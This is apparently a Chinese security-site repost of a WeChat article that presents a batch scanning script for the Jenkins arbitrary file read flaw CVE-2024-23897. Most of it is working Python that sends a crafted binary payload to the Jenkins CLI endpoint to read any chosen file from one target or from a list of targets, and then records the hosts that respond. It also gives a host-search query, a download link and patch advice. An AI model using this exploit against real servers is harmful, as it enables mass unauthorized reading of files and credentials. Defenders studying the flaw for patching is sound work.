漏洞详情01
影响范围02
version <= Jenkins 2.441version <= LTS 2.426.2
批量扫描03
批量扫描脚本
https://pan.baidu.com/s/1eADF1EqdQ_eRiLvQhjtOpg?pwd=r9ku
from urllib.parse import urlparse
import uuid
import threading
import requests
import time
# 终端输出颜色
class TerminalColor:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def create_session_id():
return str(uuid.uuid4())
def save_vulnerable_url(url):
with open(filename, "a") as file:
file.write(url + "\n")
def validate_url(website_url):
if not website_url.startswith(('http://', 'https://')):
website_url = 'http://' + website_url
return website_url
def perform_request_upload(session, url, session_id, action, file_content=None):
try:
response = session.post(
url + '/cli?remoting=false',
headers={"Session": session_id, "Side": action},
data=file_content,
allow_redirects=False,
timeout=5
)
except :
pass
def perform_request_download(session, url, session_id, action, file_content=None):
try:
response = session.post(
url + '/cli?remoting=false',
headers={"Session": session_id, "Side": action},
data=file_content,
allow_redirects=False,
timeout=5
)
if response.ok:
print(f"{TerminalColor.OKGREEN}存在漏洞地址: {urlparse(url).netloc} {TerminalColor.ENDC} {response.text}")
save_vulnerable_url(urlparse(url).netloc)
else:
print(f"{TerminalColor.WARNING}地址 {urlparse(url).netloc} 返回:{TerminalColor.ENDC} {response.status_code}")
except :
pass
def stage_exploit(target, file_to_access):
session_id = create_session_id()
session = requests.Session()
safe_url = validate_url(target)
target_parts = urlparse(safe_url)
action_url = f"{target_parts.scheme}://{target_parts.netloc}"
exploit_data = (b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' +
file_to_access.encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03')
uploader = threading.Thread(target=perform_request_upload, args=(session, action_url, session_id, "upload", exploit_data,))
downloader = threading.Thread(target=perform_request_download, args=(session, action_url, session_id, "download",))
uploader.start()
downloader.start()
uploader.join()
downloader.join()
def handle_targets(target_file, desired_file):
with open(target_file, 'r') as f:
for target in f:
print(f"{TerminalColor.OKCYAN}正在处理目标:{TerminalColor.ENDC} {target.strip()}")
stage_exploit(target.strip(), desired_file)
def run_script():
import argparse
parser = argparse.ArgumentParser(description='CVE-2024-23897漏洞扫描脚本。')
parser.add_argument('-t', '--target', help='要扫描的目标 URL。')
parser.add_argument('-T', '--targetfile', help='包含要扫描的 URL 的txt文件。')
parser.add_argument('-f', '--filepath', required=True, help='读取文件的路径')
opts = parser.parse_args()
if opts.target:
stage_exploit(opts.target, opts.filepath)
elif opts.targetfile:
handle_targets(opts.targetfile, opts.filepath)
else:
print(f"{TerminalColor.FAIL}错误:{TerminalColor.ENDC} 必须指定目标 URL 或目标文件。")
if __name__ == '__main__':
timestamp = time.strftime("%Y%m%d-%H%M%S")
filename = f"{timestamp}_存在漏洞.txt"
run_script()
语法04
app="Jenkins"Jenkins 2.442, LTS 2.426.3已禁用相关命令解析器特性。建议更新至这些版本以解决漏洞。
原文始发于微信公众号(棉花糖网络安全圈):批量扫描脚本-Jenkins任意文件读取(CVE-2024-23897)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论